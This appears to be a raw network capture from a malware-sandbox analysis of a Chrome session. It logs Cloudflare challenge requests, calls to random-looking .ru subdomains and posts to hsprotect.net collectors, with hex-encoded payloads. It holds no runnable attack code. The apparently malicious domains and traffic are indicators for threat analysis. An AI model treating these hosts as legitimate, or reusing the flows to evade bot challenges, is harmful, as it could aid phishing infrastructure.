                                                                                      2025-01-09 04:11:07 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 34685
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      CF-Chl-RetryAttempt: 0
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      CF-Challenge: D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://challenges.cloudflare.com
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:07 UTC16384OUTData Raw: 76 5f 38 66 66 31 39 34 61 38 65 62 34 38 34 32 65 63 3d 71 38 54 24 2d 74 25 32 62 59 69 74 69 4f 54 4f 67 2b 48 49 54 24 34 54 2b 5a 46 32 46 75 46 50 24 55 31 46 37 6f 46 4a 24 67 64 74 32 74 46 44 24 46 51 65 74 63 54 46 71 74 77 4b 67 54 4f 48 46 2d 24 74 42 69 4b 46 70 64 74 6c 46 43 6a 31 24 56 46 77 4b 4f 37 46 4b 4b 46 67 65 35 49 54 4f 32 46 75 4e 4e 69 46 41 24 4f 31 69 46 6b 24 4f 5a 46 68 61 42 59 46 6e 24 4f 56 38 67 79 43 46 72 50 33 46 67 68 69 45 46 55 49 49 74 73 46 45 53 74 31 69 69 4b 46 51 24 46 6f 46 2b 43 32 46 6b 42 35 6e 37 54 46 70 50 6a 75 4d 6b 35 57 59 31 61 31 69 50 35 6e 35 78 49 32 38 24 4f 52 74 4a 48 31 6c 46 46 42 65 36 75 78 54 42 77 79 58 46 24 54 38 48 77 51 44 35 65 79 43 4b 74 42 68 70 78 53 61 4b 7a 71 77 4b 4e 49
                                                                                      Data Ascii: v_8ff194a8eb4842ec=q8T$-t%2bYitiOTOg+HIT$4T+ZF2FuFP$U1F7oFJ$gdt2tFD$FQetcTFqtwKgTOHF-$tBiKFpdtlFCj1$VFwKO7FKKFge5ITO2FuNNiFA$O1iFk$OZFhaBYFn$OV8gyCFrP3FghiEFUIItsFESt1iiKFQ$FoF+C2FkB5n7TFpPjuMk5WY1a1iP5n5xI28$ORtJH1lFFBe6uxTBwyXF$T8HwQD5eyCKtBhpxSaKzqwKNI
                                                                                      2025-01-09 04:11:07 UTC16384OUTData Raw: 69 4f 54 4f 35 46 54 24 37 24 68 35 46 46 49 41 2b 52 72 24 70 24 67 33 35 59 74 24 46 57 5a 52 54 4f 76 24 6a 30 55 54 53 53 46 61 4d 50 4d 38 24 46 76 35 77 46 74 54 46 37 46 37 69 2b 31 46 59 6b 56 4b 74 79 31 61 30 50 35 2b 72 24 4f 46 6b 38 46 5a 46 39 2d 4f 64 46 74 46 4b 24 52 54 4f 4a 4b 5a 24 54 69 74 73 46 42 24 73 64 2b 42 46 73 24 46 31 2b 4b 46 43 24 6b 6e 74 31 4b 79 24 77 31 4f 45 46 2d 24 67 38 46 31 46 44 24 49 38 74 48 46 6f 47 67 4f 2b 32 24 78 31 4f 61 38 24 46 56 46 65 6c 46 64 2b 30 46 35 54 46 30 46 31 46 2b 4b 46 35 46 6e 46 37 68 2d 56 46 45 46 6b 69 74 55 46 4f 46 73 54 74 31 2b 55 46 71 24 52 74 46 48 24 55 24 55 71 45 63 24 67 69 74 48 46 52 24 71 69 2b 58 46 62 38 52 31 4f 58 46 71 46 4e 31 46 73 46 65 46 46 64 49 64 46 42 37
                                                                                      Data Ascii: iOTO5FT$7$h5FFIA+Rr$p$g35Yt$FWZRTOv$j0UTSSFaMPM8$Fv5wFtTF7F7i+1FYkVKty1a0P5+r$OFk8FZF9-OdFtFK$RTOJKZ$TitsFB$sd+BFs$F1+KFC$knt1Ky$w1OEF-$g8F1FD$I8tHFoGgO+2$x1Oa8$FVFelFd+0F5TF0F1F+KF5FnF7h-VFEFkitUFOFsTt1+UFq$RtFH$U$UqEc$gitHFR$qi+XFb8R1OXFqFN1FsFeFFdIdFB7
                                                                                      2025-01-09 04:11:07 UTC1917OUTData Raw: 70 31 4f 68 46 69 64 67 24 79 56 46 36 68 46 4e 6e 6d 6b 37 43 38 53 35 65 43 43 78 37 36 2d 59 46 67 69 67 54 2b 35 67 49 46 46 4e 2d 74 46 71 67 35 69 2b 47 46 6d 33 33 5a 54 44 4a 73 71 51 42 66 57 33 48 74 4b 55 55 37 4b 61 79 77 52 4f 24 39 63 54 71 78 45 4b 55 6f 46 49 50 52 46 68 65 53 68 4b 6d 53 57 62 59 62 68 67 4e 6b 2d 49 38 36 35 4d 43 52 73 70 74 65 67 72 4e 54 38 75 75 6b 44 5a 31 34 75 2b 64 46 49 46 77 6b 74 65 2b 48 79 31 7a 6c 79 31 6b 24 74 31 46 41 39 37 4b 74 61 6a 66 61 70 52 44 2b 67 77 49 6c 35 71 7a 59 6f 68 4f 6c 76 4b 2b 6c 46 4e 41 43 69 2b 64 46 74 4b 52 31 46 51 70 78 37 42 7a 59 56 24 61 30 48 66 68 32 24 4a 74 70 55 6a 74 46 54 33 75 6b 59 56 43 68 51 79 37 4f 62 64 50 6f 32 31 46 35 57 76 62 70 50 35 39 54 74 46 34 4b 4f
                                                                                      Data Ascii: p1OhFidg$yVF6hFNnmk7C8S5eCCx76-YFgigT+5gIFFN-tFqg5i+GFm33ZTDJsqQBfW3HtKUU7KaywRO$9cTqxEKUoFIPRFheShKmSWbYbhgNk-I865MCRsptegrNT8uukDZ14u+dFIFwkte+Hy1zly1k$t1FA97KtajfapRD+gwIl5qzYohOlvK+lFNACi+dFtKR1FQpx7BzYV$a0Hfh2$JtpUjtFT3ukYVChQy7ObdPo21F5WvbpP59TtF4KO
                                                                                      2025-01-09 04:11:07 UTC1361INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 4624
                                                                                      Connection: close
                                                                                      cf-chl-out-s: gYVjVjHPh+z6p9mY0OI0Z2L/VCuZqJ3aqawYrYwxt9MvDXEO/znSXOAbfe4S18PY9tn4CSBBb2P8j4J2Yykg/v8FEZFGW5qzIap/GbEn0F/YuiAu/s2H9Gkg9dZNOlKX33Lmw1PLZCgmws4NbbwoTyn4gSsq4ukvcH5LuNAmprerjREuZCHhG0DiwU7qHE7cz0IvdeGQXNBOmZ2QFqRGBnCv0+DIjPWkaIS5IZEdYqIMrnGp6/t/MpH9IYN+qok/Bqrg1vHuFqZxabHzVhXQjR4NRVTcgNw1e8iVfFIBUvi087vdYbAL12+EdUiGs4jQEBk8D3y7MOfLygJ5IGkurPQfIQl4a6Drw/WjTU4HwnFw1UBHpPCT5+iPuTW7SVqjGKTXYqqDyYFICHOpH+vqFqGBuGJdCwndhwaNX8tCcaGPzL5Ix+OzvnHzgsgzBKcITSrjSvPveUc7fVzIDb+ZeaK1DQ5bCWmC6yO6BqCwHZfuKYkvDwK9adrGZDx1IAj39FQB2mGh1vsnyVV0tOMMNGE3FmFEI3j0tdERNStLf0LAAH26gXP7vPDdQs7ua4RDuzHScb6cbp5usvWTRpkUifbTcoINyGFLzDVFTJyA6bUmASZuR5iEy7sUmqCklv3C+0oad8mNa6fl79VBmzoSj++FpXEzNWFmT2YcODZSgDKwtoyvoeE74N3YFq3ytWhaE9MnPt3pz9N1yE/YYguo3an0DgKGepMM25H7UcLLl3VmgnjitmJI1w8VE2BMamiL6hdWfo7rhxirTHl/uibHNeaflAy9ibkPoPzYGeLRWbRVAWQjThw/F0Sb0QUXps2xeVtIcv/o5glWYuGDw6awhbH8ENd2d3kO73YPELcbWJoUCkjl5rYbgYkKG6tDs+enOLWRhVpxk1hHwcyHZB1Rx6LmAVRMsrJqFoxuVP7UjxM2/QhHr/XEnhA2yJpnBfdvvhJ0TAz4+J1WL2IqPtQHYksVJAJKut5oEKVsuAz7slQ=$ZPXIs [TRUNCATED]
                                                                                      cf-chl-out: lgv7WZonMQHpVaXS2N4zfCvx0PaCFBWX1qDZrx+70++pRRY8ZNzQekqVksdd9MAN80RItLgYSETsiws+X4N5keYoVD/81EIYbesbMAV2ZQ==$fV72NifbKtCb0Ag2
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194dbfaa9c343-EWR
                                                                                      2025-01-09 04:11:07 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                      Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:07 UTC1345INData Raw: 5a 5a 4a 4d 52 35 42 7a 63 58 64 35 65 48 47 48 64 32 69 4b 69 34 2b 63 63 46 75 42 6d 58 57 44 69 59 65 41 6a 48 78 70 62 61 32 64 61 36 2b 57 6f 6e 46 7a 6d 49 69 77 65 58 79 6e 6a 49 6d 65 71 35 43 4e 70 4b 53 41 78 37 4f 68 67 71 43 73 6e 4b 36 4e 6a 36 75 67 74 62 43 7a 70 4b 6d 6b 78 63 36 77 76 4b 79 75 6e 64 32 36 6d 2b 50 46 77 74 71 66 79 4c 65 6c 71 65 7a 47 76 4f 2b 37 79 74 43 39 7a 38 50 32 32 61 76 33 31 38 58 58 31 72 6a 56 33 2b 44 32 31 65 2f 65 2b 64 7a 6f 31 2b 72 4a 7a 4f 58 48 45 4e 6e 71 7a 51 7a 76 37 75 50 68 37 2f 66 6f 37 50 7a 72 37 74 30 68 41 66 41 51 2f 76 30 61 2f 76 4c 68 42 77 63 4b 44 65 45 66 4a 69 73 73 49 43 73 43 45 54 4d 52 43 41 38 57 44 76 59 7a 2f 68 6f 66 4d 52 48 2b 52 6a 6f 55 49 51 56 4d 48 52 38 66 4b 6b 49
                                                                                      Data Ascii: ZZJMR5BzcXd5eHGHd2iKi4+ccFuBmXWDiYeAjHxpba2da6+WonFzmIiweXynjImeq5CNpKSAx7OhgqCsnK6Nj6ugtbCzpKmkxc6wvKyund26m+PFwtqfyLelqezGvO+7ytC9z8P22av318XX1rjV3+D21e/e+dzo1+rJzOXHENnqzQzv7uPh7/fo7Pzr7t0hAfAQ/v0a/vLhBwcKDeEfJissICsCETMRCA8WDvYz/hofMRH+RjoUIQVMHR8fKkI
                                                                                      2025-01-09 04:11:07 UTC1369INData Raw: 33 70 64 64 57 56 44 64 32 47 48 6b 45 32 4e 63 34 78 78 61 47 32 51 65 58 70 30 65 6e 56 7a 66 48 75 66 6c 35 78 2f 6e 34 47 52 67 32 43 6f 70 4a 36 55 5a 36 64 6f 65 59 43 4b 6a 36 2b 71 6b 70 4f 4e 6a 4a 75 75 75 35 71 57 73 33 79 33 72 48 71 4e 6f 71 36 42 6c 63 54 44 76 71 47 67 72 34 61 50 67 37 7a 47 78 6f 65 77 74 62 6e 48 31 4b 36 30 6a 37 6d 75 71 62 58 4c 31 4b 43 34 76 74 7a 46 74 4d 61 35 79 65 4c 59 35 4d 58 43 79 2b 65 39 35 4e 37 55 79 66 48 6b 75 4c 7a 61 32 63 76 56 7a 74 37 57 7a 64 48 64 2b 2f 44 44 35 4f 72 56 33 2b 6a 74 42 42 48 7a 7a 4e 33 50 45 41 7a 78 39 50 63 50 45 50 59 41 45 2b 6e 5a 44 66 48 35 38 66 37 6c 41 79 63 45 4a 51 6f 63 43 2f 77 47 2b 79 77 6f 44 7a 49 68 42 69 67 37 4e 52 6b 4b 4e 43 6a 39 47 6b 45 73 2b 67 45 36
                                                                                      Data Ascii: 3pddWVDd2GHkE2Nc4xxaG2QeXp0enVzfHufl5x/n4GRg2CopJ6UZ6doeYCKj6+qkpONjJuuu5qWs3y3rHqNoq6BlcTDvqGgr4aPg7zGxoewtbnH1K60j7muqbXL1KC4vtzFtMa5yeLY5MXCy+e95N7UyfHkuLza2cvVzt7WzdHd+/DD5OrV3+jtBBHzzN3PEAzx9PcPEPYAE+nZDfH58f7lAycEJQocC/wG+ywoDzIhBig7NRkKNCj9GkEs+gE6
                                                                                      2025-01-09 04:11:07 UTC1369INData Raw: 4f 4d 65 58 6c 6a 54 46 4a 53 5a 46 61 42 68 57 4f 5a 68 58 4e 33 57 6c 35 78 61 58 61 51 65 59 46 37 68 4b 68 62 6c 4a 6d 6d 6e 71 65 6b 62 4b 47 64 6b 59 57 77 6f 4c 65 6b 6b 58 43 73 75 5a 56 34 6c 4c 68 33 65 34 4f 58 6b 48 32 31 6f 63 42 38 70 36 53 47 72 73 75 43 30 64 43 70 6b 73 2b 66 6f 63 36 52 6f 72 50 57 73 5a 7a 4e 33 74 71 32 34 63 43 2b 73 62 48 45 74 71 71 64 70 37 61 33 75 74 72 48 77 2b 48 41 36 37 62 50 36 75 71 77 2b 2b 37 2b 78 38 6a 58 41 74 54 30 37 67 54 50 30 63 63 45 33 76 6a 67 2f 4d 30 41 79 77 62 62 41 2b 54 4f 34 2b 4c 6b 30 4f 2f 79 2b 42 4c 7a 45 66 67 64 37 2b 76 62 2b 66 6b 70 39 42 33 35 42 78 76 6b 2f 6a 45 4e 41 67 51 4b 36 6a 4d 49 4a 67 55 6c 44 78 55 64 39 77 73 76 44 52 4d 5a 44 43 46 43 42 7a 52 44 41 51 6c 49 43
                                                                                      Data Ascii: OMeXljTFJSZFaBhWOZhXN3Wl5xaXaQeYF7hKhblJmmnqekbKGdkYWwoLekkXCsuZV4lLh3e4OXkH21ocB8p6SGrsuC0dCpks+foc6RorPWsZzN3tq24cC+sbHEtqqdp7a3utrHw+HA67bP6uqw++7+x8jXAtT07gTP0ccE3vjg/M0AywbbA+TO4+Lk0O/y+BLzEfgd7+vb+fkp9B35Bxvk/jENAgQK6jMIJgUlDxUd9wsvDRMZDCFCBzRDAQlIC
                                                                                      2025-01-09 04:11:07 UTC541INData Raw: 77 69 46 5a 75 63 47 52 5a 55 58 43 61 62 6d 68 38 65 48 5a 72 6f 6f 46 33 66 31 39 37 64 61 75 49 6f 33 36 62 61 36 39 6f 73 62 57 30 64 4b 61 55 70 6f 6d 37 68 49 68 39 69 4b 43 31 6c 72 4b 63 77 70 43 51 73 71 69 54 75 59 66 48 6d 4d 32 76 30 4a 76 53 6b 36 6d 6f 73 72 54 55 71 71 58 53 31 72 4f 6e 75 35 69 67 34 61 7a 46 73 63 48 44 6f 4c 66 62 70 38 47 37 33 4c 6a 52 77 63 76 78 71 38 66 6a 39 76 54 46 36 4f 62 2b 7a 64 66 75 37 73 7a 4c 37 74 50 61 30 50 62 5a 30 39 58 48 34 4d 34 41 37 4f 50 6a 42 66 44 73 31 4f 37 6a 30 2b 72 6c 37 41 37 65 31 66 51 51 34 42 51 41 4a 4f 62 2b 42 4f 50 71 47 66 63 75 2f 75 58 34 49 50 4c 70 49 6a 4c 32 37 52 55 71 43 78 58 37 4d 42 41 58 49 45 4d 54 52 42 67 41 46 30 51 48 41 51 6c 4a 4e 7a 73 67 4a 78 78 51 49 30
                                                                                      Data Ascii: wiFZucGRZUXCabmh8eHZrooF3f197dauIo36ba69osbW0dKaUpom7hIh9iKC1lrKcwpCQsqiTuYfHmM2v0JvSk6mosrTUqqXS1rOnu5ig4azFscHDoLfbp8G73LjRwcvxq8fj9vTF6Ob+zdfu7szL7tPa0PbZ09XH4M4A7OPjBfDs1O7j0+rl7A7e1fQQ4BQAJOb+BOPqGfcu/uX4IPLpIjL27RUqCxX7MBAXIEMTRBgAF0QHAQlJNzsgJxxQI0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.1649742104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:08 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:08 UTC379INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 09 Jan 2025 04:11:08 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      cf-chl-out: pIFl6f+TvV9Se4pCa9XTDBSkIN3mXki6m8U=$wl8QQuSM8YmpOXwO
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194e0db034405-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:08 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                      Data Ascii: invalid


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.1649744172.67.155.454437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:08 UTC661OUTGET /88179202633210629qXfkzyHvrVBUQZUAWKGZUAFRQZZZMLJBLFELJHJ HTTP/1.1
                                                                                      Host: ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://lap.gnoqwwhpwe.ru
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:09 UTC904INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fX%2FlA7R5pnPEwKilMDvpn4upHurofbAzTvn1RNujaoA84Kcs5BZZDZl1FJljrhX8BAPQHgd6Tz6I7yYZ4B0wk56HU89OXjp6WxJnWcN%2BlNpy3xoZY%2FHk0IfMDZ%2FJYxUedpcEoix%2BOw5UCD9F2lrkA3ImrwuVnyarnsnDuOu9hxjeUtEdm%2BDrWROa2EhnQAG%2BrgoyzBz2ij16Gdj%2F"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194e4ce9e4228-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1691&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1239&delivery_rate=1627647&cwnd=209&unsent_bytes=0&cid=95588ee99f4d3431&ts=563&x=0"
                                                                                      2025-01-09 04:11:09 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                      Data Ascii: 11
                                                                                      2025-01-09 04:11:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.1649747104.21.6.2224437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:10 UTC453OUTGET /88179202633210629qXfkzyHvrVBUQZUAWKGZUAFRQZZZMLJBLFELJHJ HTTP/1.1
                                                                                      Host: ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:10 UTC896INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:10 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7I9UeNZ%2BPDzPxCF3SLA38XmG1wdEhbDDA2sG3SXKjIGeOEtYr%2FGKUeqwJmbFkTDqwlebz5xlw48XMHroKmd0LYiEebDyIn1B7OVRcrXf7X0MQYcqri8mUdQRjR47GEwpAfQYuk7mcPfZmsmejGx8edTOwLOg1uNAagEFL6zKIcWxgubCDJZjiX5e%2B97%2Frw4YiuCmRDDAEFxaWDl8"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194ec192842fd-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1699&rtt_var=667&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1031&delivery_rate=1606160&cwnd=248&unsent_bytes=0&cid=c5d05e87db1c74a6&ts=560&x=0"
                                                                                      2025-01-09 04:11:10 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                      Data Ascii: 11
                                                                                      2025-01-09 04:11:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.164982735.190.10.964437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:12:02 UTC649OUTPOST /api/v2/msft HTTP/1.1
                                                                                      Host: collector-pxzc5j78di.hsprotect.net
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 612
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Origin: https://msft.hsprotect.net
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://msft.hsprotect.net/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:12:02 UTC612OUTData Raw: 70 61 79 6c 6f 61 64 3d 61 55 6b 51 52 68 41 49 45 48 42 30 58 51 42 31 57 58 63 44 66 56 73 43 44 78 41 65 45 46 59 51 43 45 6b 51 61 31 68 56 59 33 31 78 59 47 42 33 59 77 6f 50 45 41 67 51 57 6b 5a 47 51 6b 45 49 48 52 31 66 51 56 52 47 48 46 70 42 51 6b 42 64 52 6c 64 52 52 68 78 63 56 30 59 64 57 31 78 57 56 30 6f 63 57 6b 5a 66 58 68 41 65 45 46 64 56 63 33 74 6a 64 67 74 47 64 6d 70 6e 44 78 41 49 41 78 34 51 55 48 70 37 56 31 46 62 57 57 68 36 57 56 55 50 45 41 67 51 5a 56 74 63 41 51 41 51 48 68 42 71 64 58 68 48 61 31 70 64 64 31 4d 44 65 77 38 51 43 41 49 65 45 48 68 4b 41 6d 52 36 5a 58 51 42 64 46 73 4b 44 78 41 49 41 41 47 59 42 42 52 34 51 5e 5a 77 4a 5a 57 6d 46 67 61 31 6c 37 65 6e 53 38 50 45 41 67 42 42 41 49 43 48 68 42 30 63 56 31 66
                                                                                      Data Ascii: payload=aUkQRhAIEHB0XQB1WXcDfVsCDxAeEFYQCEkQa1hVY31xYGB3YwoPEAgQWkZGQkEIHR1fQVRGHFpBQkBdRldRRhxcV0YdW1xWV0ocWkZfXhAeEFdVc3tjdgtGdmpnDxAIAx4QUHp7V1FbWWh6WVUPEAgQZVtcAQAQHhBqdXhHa1pdd1MDew8QCAIeEHhKAmR6ZXQBdFsKDxAIAAGYBBR4Q^ZwJZWmFga1l7enS8PEAgBBAICHhB0cV1f
                                                                                      2025-01-09 04:12:02 UTC400INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:12:01 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Content-Length: 904
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                      Access-Control-Allow-Origin: https://msft.hsprotect.net
                                                                                      Timing-Allow-Origin: *
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close
                                                                                      2025-01-09 04:12:02 UTC904INData Raw: 7b 22 64 6f 22 3a 6e 75 6c 6c 2c 22 6f 62 22 3a 22 63 31 42 51 55 46 42 7a 59 33 6f 76 65 33 34 74 66 58 70 2b 4d 6e 78 36 4c 48 6b 79 4c 69 35 36 65 54 49 6e 4a 33 73 71 4d 6e 78 39 4a 33 73 75 4a 6e 6f 6e 4b 33 6f 70 4b 32 46 68 59 57 46 7a 55 46 42 7a 63 33 4e 6a 66 47 70 68 59 57 46 68 55 48 4e 51 55 46 42 7a 59 79 6f 71 4a 79 73 6f 4c 43 34 74 4c 79 77 76 4b 43 59 6d 4a 79 63 76 4b 79 38 71 59 57 46 68 59 56 42 7a 63 33 4e 51 63 33 4e 51 59 79 34 6f 4c 43 6b 73 4a 69 6f 6d 4c 53 30 74 4b 53 64 68 59 57 46 68 63 33 4e 7a 63 31 42 51 59 33 78 72 61 58 52 76 4b 33 64 74 4c 6e 52 76 4c 53 6c 36 64 33 51 73 4b 33 68 34 59 57 46 68 59 56 42 7a 63 33 4e 51 63 31 42 7a 59 79 67 74 4c 57 46 68 59 57 46 51 63 33 4e 7a 55 46 42 51 63 32 4e 36 4c 33 74 2b 4c 58
                                                                                      Data Ascii: {"do":null,"ob":"c1BQUFBzY3ove34tfXp+Mnx6LHkyLi56eTInJ3sqMnx9J3suJnonK3opK2FhYWFzUFBzc3NjfGphYWFhUHNQUFBzYyoqJysoLC4tLywvKCYmJycvKy8qYWFhYVBzc3NQc3NQYy4oLCksJiomLS0tKSdhYWFhc3Nzc1BQY3xraXRvK3dtLnRvLSl6d3QsK3h4YWFhYVBzc3NQc1BzYygtLWFhYWFQc3NzUFBQc2N6L3t+LX


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.164982534.107.199.614437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:12:02 UTC591OUTGET /ns?c=dfd0a870-ce3f-11ef-ae3b-e12a94f7ceb6 HTTP/1.1
                                                                                      Host: stk.hsprotect.net
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
